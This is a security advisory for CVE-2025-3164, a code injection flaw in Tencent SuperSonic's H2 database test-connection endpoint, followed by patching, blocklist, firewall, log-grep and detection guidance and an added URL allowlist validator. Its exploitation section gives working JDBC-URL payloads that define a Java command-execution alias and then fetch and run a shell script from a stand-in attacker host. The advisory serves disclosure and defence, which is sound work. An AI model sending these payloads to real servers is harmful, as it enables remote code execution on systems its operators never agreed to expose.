Tencent Music Entertainment SuperSonic, Code Injection, CVE-2025-3164 (Critical)


How CVE-2025-3164 Works

CVE-2025-3164 is a critical code injection vulnerability in Tencent Music Entertainment SuperSonic (versions up to and including v0.9.8). The flaw is in the `/api/semantic/database/testConnect` endpoint, which tests H2 database connections. Because the endpoint does not properly validate its input, an attacker can inject malicious code through a crafted request and achieve remote code execution (RCE). The H2 database component processes the unsanitized, user-supplied connection data, which allows arbitrary Java code execution through insecure deserialization or script evaluation. The vulnerability is remotely exploitable and, in some configurations, requires no authentication, which makes it highly dangerous.

DailyCVE Form:

Platform: Tencent SuperSonic
Version: ≤ 0.9.8
Vulnerability: Code Injection
Severity: Critical
Date: 04/23/2025

What Undercode Says:

Exploitation:

1. Craft malicious payload:

POST /api/semantic/database/testConnect HTTP/1.1
Host: target.com
Content-Type: application/json
{"jdbcUrl":"jdbc:h2:mem:;INIT=CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd); return \"ok\";}'"}

2. Trigger RCE:

POST /api/semantic/database/testConnect HTTP/1.1
Host: target.com
Content-Type: application/json
{"jdbcUrl":"jdbc:h2:mem:;CALL EXEC('curl attacker.com/shell.sh -o /tmp/shell && chmod +x /tmp/shell && /tmp/shell')"}

Protection:

1. Patch: Upgrade to SuperSonic v0.9.9+.

2. Input Validation:

// Substring blocklist: case-sensitive and limited to these two keywords,
// so it is a stopgap until the patched version is deployed.
if (jdbcUrl.contains("INIT") || jdbcUrl.contains("CALL")) {
    throw new SecurityException("Malicious input detected");
}

3. Network Controls:

Block unauthorized H2 commands via a WAF, or as a stopgap match the string at the packet level (only effective on plaintext HTTP traffic):

iptables -A INPUT -p tcp --dport 8080 -m string --string "jdbc:h2:mem:;INIT" -j DROP

4. Log Monitoring:

grep -E "jdbc:h2:mem:;INIT|CALL EXEC" /var/log/supersonic/access.log

5. Mitigation: Disable H2 remote connections if unused:

application.properties:
spring.h2.console.enabled=false

6. Exploit Detection:

import requests

vuln_endpoint = "http://target.com/api/semantic/database/testConnect"
# A benign INIT statement is enough to check whether the endpoint passes
# URL settings through to H2; no command is executed.
response = requests.post(
    vuln_endpoint,
    json={"jdbcUrl": "jdbc:h2:mem:;INIT=SELECT 1"},
    timeout=10,
)
if "H2" in response.text and response.status_code == 200:
    print("Vulnerable to CVE-2025-3164")
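As an added example (not code from the advisory or from the SuperSonic project), a stricter version of the input validation in Protection step 2: instead of a substring blocklist, parse the H2 JDBC URL the way H2 does (settings after the first `;`, keys upper-cased before comparison) and accept only an allowlist of connection settings, so `INIT` is rejected regardless of letter case. The allowlist contents and the function names `naive_check`, `split_settings` and `validate_h2_url` are this example's own assumptions.

```python
from typing import List, Tuple

# Constructed allowlist for this example: connection settings an administrator
# may legitimately pass. Anything else, INIT included, is rejected by default.
ALLOWED_SETTINGS = {"DB_CLOSE_DELAY", "MODE", "IGNORECASE", "DATABASE_TO_UPPER"}
H2_PREFIX = "jdbc:h2:"


def naive_check(jdbc_url: str) -> bool:
    """The substring blocklist from Protection step 2; True means 'flagged'."""
    return "INIT" in jdbc_url or "CALL" in jdbc_url


def split_settings(settings: str) -> List[str]:
    """Split on ';' while honouring backslash escapes, as H2's URL parser does."""
    parts, current, i = [], [], 0
    while i < len(settings):
        ch = settings[i]
        if ch == "\\" and i + 1 < len(settings):
            current.append(settings[i + 1])  # escaped character, taken literally
            i += 2
            continue
        if ch == ";":
            parts.append("".join(current))
            current = []
        else:
            current.append(ch)
        i += 1
    parts.append("".join(current))
    return [p for p in parts if p]


def validate_h2_url(jdbc_url: str) -> Tuple[bool, str]:
    """Return (accepted, reason). Keys are upper-cased before matching because
    H2 treats setting names case-insensitively, so 'init=' equals 'INIT='."""
    if not jdbc_url.startswith(H2_PREFIX):
        return False, "not an H2 URL"
    _base, _sep, settings = jdbc_url[len(H2_PREFIX):].partition(";")
    for setting in split_settings(settings):
        key, eq, _value = setting.partition("=")
        if not eq:
            return False, f"malformed setting {setting!r}"
        key = key.upper()
        if key not in ALLOWED_SETTINGS:
            return False, f"setting {key} is not allowed"
    return True, "ok"
```

Run against the URLs the advisory discusses, `naive_check` misses a lower-case `init=` while `validate_h2_url` rejects it, which is the gap the allowlist closes.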

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
